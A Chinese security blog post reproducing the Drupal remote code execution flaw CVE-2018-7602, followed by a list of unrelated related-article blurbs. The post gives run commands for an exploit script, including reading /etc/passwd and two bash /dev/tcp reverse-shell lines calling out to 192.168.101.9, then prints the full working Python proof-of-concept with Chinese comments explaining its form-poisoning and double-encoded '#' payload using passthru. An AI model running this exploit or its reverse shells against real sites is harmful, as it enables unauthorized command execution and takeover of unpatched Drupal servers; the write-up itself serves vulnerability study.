Drupal遠程代碼執行(CVE-2018-7602)與其Poc分析

原創 想冲大厂的癞蛤蟆 2020-06-29 22:19

漏洞概述

這個漏洞是CVE-2018-7600的繞過利用,兩個漏洞原理是一樣的。攻擊者可以通過不同方式利用該漏洞遠程執行代碼。CVE-2018-7602這個漏洞是CVE-2018-7600的另一個利用點,只是入口方式不一樣。所以,一旦參數可控並且沒有經過正確的過濾,就很有可能出問題。
 

漏洞影響

①對URL中的#進行編碼兩次,繞過sanitize()函數過濾
②任意命令執行
③…

影響版本

Drupal 7.x,8.x

修復版本

Drupal 7.59,Drupal 8.5.3,Drupal 8.4.8
 

漏洞復現及利用

-c參數後的"id"爲要執行的命令 第一個root爲用戶名 第二個root爲密碼
python3 drupa7-CVE-2018-7602.py -c “id” root root http://127.0.0.1:8081/
在這裏插入圖片描述
//查看內核版本
python3 drupa7-CVE-2018-7602.py -c “uname -a” root root http://127.0.0.1:8081/
在這裏插入圖片描述
//查看敏感文件
python3 drupa7-CVE-2018-7602.py -c “cat …/…/…/…/…/etc/passwd” root root http://127.0.0.1:8081/
在這裏插入圖片描述
//反向shell(好像利用不到?)
①python3 drupa7-CVE-2018-7602.py -c “bash –i >& /dev/tcp/192.168.101.9/2333 0>&1” root root http://127.0.0.1:8081/
②python3 drupa7-CVE-2018-7602.py -c “cd …/…/…/…/…/…/ && bash –i >& /dev/tcp/192.168.101.9/2333 0>&1” root root http://127.0.0.1:8081/
③…傳送門
 

poc簡單分析

(都在註釋裏呢~)

#!/usr/bin/env python3

import requests
import argparse
from bs4 import BeautifulSoup

def get_args():  //獲取參數
  parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7602.py",
                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
                    epilog= '''
                    This script will exploit the (CVE-2018-7602) vulnerability in Drupal 7 <= 7.58
                    using an valid account and poisoning the cancel account form (user_cancel_confirm_form) 
                    with the 'destination' variable and triggering it with the upload file via ajax (/file/ajax).
                    ''')

  parser.add_argument("user", help="Username")  //用戶名
  parser.add_argument("password", help="Password")  //密碼
  parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")  //目標
  parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")   //參數
  parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
  parser.add_argument("-x", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
  args = parser.parse_args()
  return args

def pwn_target(target, username, password, function, command, proxy):
  requests.packages.urllib3.disable_warnings()  //判斷抓包無誤
  session = requests.Session() //獲取seesion
  proxyConf = {'http': proxy, 'https': proxy}  //none proxy
  try:
    print('[*] Creating a session using the provided credential...')
    get_params = {'q':'user/login'}  //構造get
    post_params = {'form_id':'user_login', 'name': username, 'pass' : password, 'op':'Log in'} //構造post
    print('[*] Finding User ID...')
    session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf) //構造postseesion
    get_params = {'q':'user'}
    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)  //構造getseesion
    soup = BeautifulSoup(r.text, "html.parser") //爬取頁面
    user_id = soup.find('meta', {'property': 'foaf:name'}).get('about')  //抓關鍵字
    if ("?q=" in user_id):
      user_id = user_id.split("=")[1]  //=作分隔符,再通過索引[1]取出所得數組中的第二個元素的值
    if(user_id):
      print('[*] User ID found: ' + user_id)  //以上主要抓取user_id值

    print('[*] Poisoning a form using \'destination\' and including it in cache.')
    get_params = {'q': user_id + '/cancel'}
    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
    soup = BeautifulSoup(r.text, "html.parser")
    form = soup.find('form', {'id': 'user-cancel-confirm-form'})
    form_token = form.find('input', {'name': 'form_token'}).get('value') //以上主要獲取form_token參數值

    // %23#的URL編碼
    //其中%2523是對#的兩次URL編碼 %25是%的URL編碼
    //例如:POST /drupal-7.59/drupal-7.59/node/9/delete?destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=id
    get_params = {'q': user_id + '/cancel', 'destination' : user_id +'/cancel?q[%23post_render][]=' + function + '&q[%23type]=markup&q[%23markup]=' + command }
    // # 繞過sanitize(),stripDangrousValues函數檢查。
    //在Drupal應用對destination URL進行處理時,會再次解碼%23,獲得#
    

    post_params = {'form_id':'user_cancel_confirm_form','form_token': form_token, '_triggering_element_name':'form_id', 'op':'Cancel account'}

    r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
    soup = BeautifulSoup(r.text, "html.parser")
    form = soup.find('form', {'id': 'user-cancel-confirm-form'})
    form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')

    //關鍵點是讓系統緩存一個form_build_id,這個form存着我們傳入的惡意參數,第二個請求從中取出來然後執行
    //觸發漏洞還是需要發兩個post包,一個存入form_build_id一個取出後執行
    if form_build_id:
        print('[*] Poisoned form ID: ' + form_build_id)
        print('[*] Triggering exploit to execute: ' + command)
        get_params = {'q':'file/ajax/actions/cancel/#options/path/' + form_build_id}
        post_params = {'form_build_id':form_build_id}
        r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
        parsed_result = r.text.split('[{"command":"settings"')[0]
        print(parsed_result)
  except:
    print("ERROR: Something went wrong.")
    raise

def main():
  print ()
  print ('===================================================================================')
  print ('|   DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602)     |')
  print ('|                                   by pimps                                      |')
  print ('===================================================================================\n')

  args = get_args() # get the cl args  //return args
  pwn_target(args.target.strip(),args.user.strip(),args.password.strip(), args.function.strip(), args.command.strip(), args.proxy.strip()) //目標,用戶名,密碼,參數值


if __name__ == '__main__':
  main()

 
GOT IT!
簡單收穫——對poc又進一步瞭解

 
******************************************************
小實驗小結,具體測試利用方式需根據具體實踐場景~

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

sql注入繞waf小Tips

因爲對上次比賽sql的題挺不甘心 所以又着重複習了一遍sql,並記錄了平常繞waf的點 手工bypass要點 先通過破壞關鍵字測試出攔截規則 之後進行鍼對性繞過 Mysql 前期詳解:傳送門 1.1、聯合注入 0x01 and繞過

想冲大厂的癞蛤蟆 2020-07-07 11:59:33

從WordPress切換到Joomla的10個理由

許多Web開發人員幾年前離開Joomla,而是選擇了Wordpress。目前,WordPress是世界上最受歡迎的內容管理系統。它起初只是一個專門用於博客的平臺,但在過去幾年中有了很大的發展和進步。作爲擁有數百萬安裝量的同類領先軟件,WP通

原創 2021-01-30 09:26:34

WordPress與Joomla與Drupal綜合比較

如果您正在考慮建立網站或博客,則應考慮使用市場上最好的CMS,CMS(內容管理系統)可幫助您創建,管理和修改網站內容,而無需任何HTML或CSS編碼技能。 現代CMS平臺的易用性意味着任何人都可以自己構建一個美觀的網站。 您無需成爲Web

原創 2021-01-30 09:26:34

drupal 7 的RSS

Drupal的RSS功能默認是啓用的,如果不使用外部模塊是不能將其關閉的。 如果想阻止站點生成RSS Feed,可安裝RSS Permissions(RSS權限),其下載地址是http://drupal.org/project/rss_p

半截烟头 2020-07-03 10:34:14

phpmyadmin 導入數據庫出現 “MySQL server has gone away”

同“#1153 - Got a packet bigger than 'max_allowed_packet' bytes”一樣   見http://blog.csdn.net/ejc2001/article/details/197632

半截烟头 2020-07-03 10:34:14

phpmyadmin 導入SQL文件時最大隻能爲2M

修改: 打開php安裝目錄下的php.ini,修改 upload_max_filesize = 10M 把後面的數字擴大,默認爲2M

半截烟头 2020-07-03 10:34:14

另眼觀Drupal:從面向對象(OPP)的角度看Drupal

http://www.intematrix.cn/blogs/drupal/Drupal-OPP

hhy_huang 2020-07-02 08:48:32

8_25 設置用戶id或組id的程序絕對不能再調用system函數。安全漏洞

vim 8_24.c #include "apue.h" int main(int argc, char *argv[]) {         int status;         if(argc < 2)              

ciky2011 2020-07-08 08:56:44

CVE-­2020­-0796(永恆之黑)漏洞復現Getshell

MySQL數據庫從入門到實戰應用 CVE-­2020­-0796漏洞復現CVE-­2020­-0796受影響的系統版本環境搭建漏洞檢測-掃描漏洞復現-返回會話漏洞復現-藍屏攻擊視頻演示漏洞修復 CVE-­2020­-0796

小陈classmate 2020-07-05 14:10:43

Ubantu16.04服務器nginx配置安全狗防護

文章目錄一、前言二、正文1.服務器安裝安全狗2.控制檯綁定服務器ip三、總結 一、前言 6月是個忙碌的季節,百忙之中有小夥伴來問到:“你換域名了嗎?”我詫異,明明什麼都沒有做,立馬打開瀏覽器輸入訪問我的網站,出現了無法訪問的情況。

cungudafa 2020-07-03 19:11:35

小心你的密碼管理器 LastPass曝出安全漏洞

今天,各種各樣的金融賬戶、網絡帳戶、個人信息都需要用到密碼,但對於大多數人來說,常用的密碼十分有限,而且一旦使用長一些、複雜一些的新密碼後,往往一段時間過後便被忘的一乾二淨。所以,目前有數以百萬計的人依靠密碼管理器來保存他們的密碼,並幫

jlangqi 2020-07-03 09:07:29

任意用戶密碼修改重置漏洞修復

0x00 背景 密碼修改功能常採用分步驟方式來實現,攻擊者在未知原始密碼的情況下繞過某些檢驗步驟修改用戶密碼。 重置密碼過程一般是首先驗證註冊的郵箱或者手機號,獲取重置密碼的鏈接(一般會包含一串唯一的字符串)或者驗證碼,然後訪問重置密碼鏈

煜铭2011 2020-07-02 14:46:36

OWASP發佈構建安全Web應用的十大控制措施

Open Web Application Security Project(OWASP)是世界範圍內的非盈利組織,關注於提高軟件系統的安全性。它們的使命是使應用軟件更加安全,使企業和組織能夠對應用安全風險作出更清晰的決策。OWASP發佈

wxy_fighting 2020-07-01 19:17:31

Linux應急響應基礎(Linux服務器入侵響應)學習

主要是階段性的總結一些Linux下的應急響應常用命令及技巧 文章目錄登錄和終端信息查看登錄用戶信息查看登錄失敗信息查看用戶上一次的登錄情況查看當前登錄系統的情況查看登錄成功信息查看登錄失敗信息強制用戶下線終端歷史命令用戶信息查看是

尸者狗 2020-06-30 21:35:34

Fofa的簡單使用

因爲沒氪金,沒法深入研究,,, 文章目錄地址簡介查詢語法參考基本語法邏輯運算符其他 地址 https://www.fofa.so/ 簡介 官網這樣描述:FOFA是白帽匯推出的一款網絡空間資產搜索引擎。它能夠幫助用戶迅速進行網絡資產

尸者狗 2020-06-30 21:35:34